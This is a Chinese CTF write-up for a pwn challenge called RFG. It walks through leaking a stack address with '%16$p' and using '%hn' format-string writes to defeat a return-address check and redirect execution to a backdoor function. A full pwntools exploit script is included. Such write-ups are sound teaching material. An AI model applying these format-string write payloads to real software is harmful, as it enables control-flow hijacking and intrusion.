CTF PWN 格式化字符串

已于 2022-06-05 18:45:43 修改
阅读量1.1k 收藏 4
点赞数 10
文章标签: 安全 学习
于 2022-06-05 18:44:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/VisualNull/article/details/125134540
版权

CTF PWN格式化字符串

题目名字叫RFG

这是去年刚开始学格式化字符串时做的题,当时完全不会做(太菜了)
今天拿出来复现了一下.

首先拿到题

在这里插入图片描述
可以看到只有PIE没有开
IDA逆向F5 拿到伪C代码
开始分析

在这里插入图片描述
在这里插入图片描述
可以看到存在一个后门函数
进入vuln函数查看

在这里插入图片描述
逻辑比较简单
存在一个格式化字符串漏洞
但是有一个检测
在执行前保存了vuln函数的返回地址
执行结束后进行了一个检验

由于程序没有开启PIE保护
我们可以利用格式化字符串对saved_return_address的值进行任意写
来绕过他的检测

同时可以用任意写来覆盖vuln的返回地址到后门函数

因为返回地址是直接存在栈上的
而要想实现覆盖返回地址
就必须拿到返回地址所在的栈地址

通过gdb调试我们发现
rbp的值存储的是一个栈地址
因此我们可以通过泄露rbp的值
然后计算偏移来得到返回地址所在的栈地址

这是整体的思路

泄露vuln函数返回地址所在的栈地址
修改saved_return_address的值
通过泄露出的栈地址修改vuln函数的返回地址
get shell

详细步骤

-----我是分割线--------

首先是泄露vuln函数返回地址所在的栈地址
使用gdb在vuln函数上下断点
然后运行
输入aaaaaaaa
到printf上使用stack 20查看栈上的数据
可以看到rbp的值是一个栈地址
紧挨着下面的便是返回地址
在这里插入图片描述
绿框是我们要泄露的
红框是我们要进行任意写的地址
同时我们可以算出
返回地址所在的栈地址+24=我们泄露的值

可以算出偏移=6+0xa=0x10(16)
输入"%16$p"就能把rbp的值以指针的形式打印出来

from pwn import *
sh=process("./rfg")
payload=b'%16$p'
sh.send(payload)

在这里插入图片描述
这样就能拿到我们需要进行任意读写的地址了(返回地址所在的栈地址)

rbp=int(sh.recv(),16)#这里有个点,printf是以%p的形式打印出来的,所以接受的时候不需要用u64函数处理,直接当成16进制数据转成int即可
print(hex(rbp))
retaddressOnstack=rbp-0x18
print(hex(rbp))

整个程序共三次循环
第一次循环使用完毕

第二次循环我们可以覆盖变量saved_return_address的值
对比后门函数的地址和正常返回地址
可以看到有两个字节不同
因此可以用%h一次写入两个字节

0x401282 后门函数地址
0x40138F 正常返回地址
因此写入0x1382(4738)个字节即可

payload=b'%4738c%10$hnaaaa'+p64(saveaddress)#aaaa是进行16对齐,后面压入要进行读写的地址,从gdb上可以看到格式化字符串是 saveaddress在第10个参数,因此要填$10
sh.send(payload)

第二次循环结束
检测绕过

第三次循环
我们对返回地址进行读写
用我们第一次泄露得到的栈地址
得到返回函数所在的栈地址
然后和第二次循环一样,任意读写
参数位置也是一样的,因为压入了同一个位置

payload=b'%4738c%10$hnaaaa'+p64(retaddressOnstack)
sh.send(payload)

最终完整exp

from pwn import *
sh=process("./rfg")
retaddress=0x40138f
backdoor=0x401282
saveaddress=0x404050
gdb.attach(sh)
payload=b'%16$p'
sh.send(payload)
rbp=int(sh.recv(),16)
print(hex(rbp))
retaddressOnstack=rbp-0x18
payload=b'%4738c%10$hnaaaa'+p64(saveaddress)
sh.send(payload)
sh.recvuntil("aaaa")
payload=b'%4738c%10$hnaaaa'+p64(retaddressOnstack)
sh.send(payload)
sh.recvuntil("aaaa")

sh.interactive()
Visua1NULL
关注
  • 10
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CTF逆向中字符串处理
小强的博客
08-31 1676
  str=''' .data:04001234 db 93h .data:04001234 db 0A2h .data:04001234 db 0ADh '''str=str.replace("\n"," ").replace("\r"," ").split(" ") str = [i for i in str if i != ''] #clear null meta #print...
记一次赛题--pwn--没有溢出啦【格式化字符串
qq_73149934的博客
12-12 215
记一次赛题--pwn--没有溢出啦【格式化字符串
buuctf-pwn 5-8
m0_74355719的博客
10-04 76
查看栈结构发现v2的度为0x3c,即60个字节,而输入被限制在32个字节内,每个I可以被替换成you,所以输入60÷3=20个I就能让栈溢出,然后db 4 dup(?发现明显的格式化漏洞,因为这个dword_804c044从服务器读入,无法知道其内容,所以使用%n将其数据修改,随后passwd输入相同的数据即可得到shell。思路:利用字符串漏洞将判断的atoi直接替换成system,然后手动输入"/bin/sh"字符串,即可达成system(“/bin/sh”)目的。
CTF| 格式化字符串漏洞
最新发布
2401_84466227的博客
05-28 1049
printf("格式化字符串",参数...)该printf函数的第一个参数是由格式化说明符与字符串组成,用来规定参数用什么格式输出内容。格式化说明符:%d - 十进制 - 输出十进制整数%s - 字符串 - 从内存中读取字符串%x - 十六进制 - 输出十六进制数%c - 字符 - 输出字符%p - 指针 - 指针地址%n - 到目前为止所写的字符数例如:return 0;调用以后会显示:特别要注意的是%n这个格式化字符串,它的功能是将%n。
CTF(pwn)-格式化字符串漏洞讲解(一)
半岛铁盒的博客
02-25 861
一、基本介绍 格式化字符串漏洞在通用漏洞类型库CWE中的编号是134,其解释为“软件使用了格式化字符串作为参数,且该格式化字符串来自外部输入”。会触发该漏洞的函数很有限,主要就是printf、sprintf、fprintf等print家族函数。 printf()函数的一般形式为printf(“格式化字符串”,参数…),其第一个参数就是格式化字符串,用来告诉程序以什么格式进行输出。 它的参数是由格式化说明符与字符串组成的,通过格式化说明符来规定参数用什么格式输出内容。 格式化说明符有这些: %d - 十进制
PWN学习总结
windy_ll的博客
12-26 1810
一、栈溢出原理     什么是栈溢出?栈溢出就是缓冲区溢出的一种。 由于缓冲区溢出而使得有用的存储单元被改写,往往会引发不可预料的后果。程序在运行过程中,为了临时存取数据的需要,一般都要分配一些内存空间,通常称这些空间为缓冲区。如果向缓冲区中写入超过其本身度的数据,以致于缓冲区无法容纳,就会造成缓冲区以外的存储单元被改写,这种现象就称为缓冲区溢出。缓冲区度一般与用户自己定义的缓冲变量的类型有关。(PS:摘自百度百科)     简单来说,就是程序没有检查用户输入的数据度,导致攻击者覆盖栈上不是程序希望写
信息安全_CTFPWN题目实例分析.pptx
08-14
在本文中,我们将深入分析 PWN 题目中的常见漏洞,包括堆栈溢出漏洞和格式化字符串漏洞,并对其进行详细的分析和解释。 堆栈溢出漏洞 堆栈溢出漏洞是一种常见的漏洞类型,发生在函数调用时,函数的返回地址被覆盖...
PWN测试题目
07-18
2. **格式字符串漏洞**:利用printf等函数的格式化字符串特性,可以修改内存中的内容。理解格式化字符串的工作原理和相关的安全限制是解决这类问题的关键。 3. **堆操作**:包括Fastbin Dup、Unsorted Bin Attack、...
Pwn学习路线及学习笔记以及gem安装
10-15
学习Pwn的过程中,需要了解栈溢出、格式化字符串等基本概念。作者建议在学习Pwn的同时,也学习相关的安全知识,例如CTF、Binary Exploitation等。 四、学习心得 作者认为学习Pwn需要耐心和坚持,需要一步一步地...
pwn栈溢出10道练习题有writeup
01-04
4. **格式字符串漏洞**:特定函数如`printf`和`scanf`允许使用格式化字符串,如果用户输入不受限制,可以导致栈溢出。学习如何识别和利用这些漏洞是pwn题目的常见部分。 5. **堆溢出**:虽然题目主要关注栈溢出,但...
CTF常见题型及解题思路.docx
10-22
**PWN(exploitation)**涉及缓冲区溢出,如整数溢出、数组边界溢出、格式字符串漏洞、条件竞争和逻辑漏洞,通过这些漏洞实现代码执行和权限提升。 **Miscellaneous**类别广泛,可能包括隐写术(隐藏在图像中的信息...
[第五空间2019 决赛]PWN5 | BUUCTF | 格式化字符串 | 计算偏移量
Dem1的博客
04-09 798
正经wp from pwn import* p=remote("node4.buuoj.cn",29506) bssaddr = 0x804c044 #binaddr = 0x0804932F #1 #payload = 'aaaa-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x' ## aaaa-ffb14fe8-63-0-ffb1500e-3-c2-f7e9791b-ffb1500e-ffb1510c-61616161-2d78252d-252d78
PWN——格式化字符串泄露canary
djhtdjdywgjc的博客
11-19 1239
格式化字符串泄露canary
pwn刷题num26-----格式化字符串漏洞实现任意地址修改
tbsqigongzi的博客
04-27 459
BUUCTF-PWN-[第五空间2019 决赛]PWN5 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 开启canary保护-----栈溢出需绕过canary 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 程序运行后首先输入一个name 然后输入密码(passwd) 最后fail ida看一下伪代码 观察主函数,发现格式化字符串漏洞 printf(&buf);
pwn格式化字符串的浅显理解
javagty6778的博客
03-19 209
这时候可以输入格式化字符 %d,%p等控制函数的输出。2.### 简单解释格式化字符串原理1.这是两段程序的源码:* 1️⃣。2.对应的汇编代码:* 1️⃣。
初步学习CTF格式化字符串漏洞(待更新)
哔...的博客
03-25 949
初步学习CTF格式化字符串漏洞(待更新) 文章目录初步学习CTF格式化字符串漏洞(待更新)格式化字符串漏洞原理利用格式化字符串进行任意地址读利用格式化字符串进行任意地址写 https://veritas501.space/2017/04/28/格式化字符串漏洞学习/ 先 List item 看看例子 int main() { char s[60]; char v6 FILE* s...
格式化字符漏洞 tamuCTF pwn3 writeup
charlie_heng的专栏
06-05 1004
之前一直不怎么会格式化字符串的漏洞,刚好碰上这道题,学习一波首先看下main函数,读一个字符串,然后打印出来,之后直接exit(0) 无法利用栈溢出跳转,但是prinf是直接打印读取的东西,这里就存在一个格式化字符串漏洞。 这里推荐一个格式化字符串漏洞入门的教程: http://codearcana.com/posts/2013/05/02/introduction-to-format-stri
Blind_pwn格式化字符串
蚁景网安学院
07-07 994
可能需要提前了解的知识格式化字符串原理&利用got & plt 调用关系程序的一般启动过程原理格式化字符串盲打指的是只给出可交互的 ip 地址与端口,不给出对应的 bin...
Linux pwn入门教程(6)——格式化字符串漏洞
xiaoi123的博客
08-03 2247
作者:Tangerine@SAINTSEC 0x00 printf函数中的漏洞 printf函数族是一个在C编程中比较常用的函数族。通常来说,我们会使用printf([格式化字符串],参数)的形式来进行调用,例如 char s[20] = “Hello world!\n”; printf(“%s”, s); 然而,有时候为了省事也会写成 char s[20] = “Hello wor...
pwn刷题num41---格式化字符串漏洞任意地址修改
tbsqigongzi的博客
05-02 594
BUUCTF-PWN-jarvisoj_fm 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 开启canary保护-----栈溢出需要绕过canary 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida看伪代码 简单的代码,可知只要x=4就可获得shell 思路 用read函数输入一个字符串,之后printf格式化字符串漏洞实现任意地址修改,将x的值改为4 先找一下输入
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值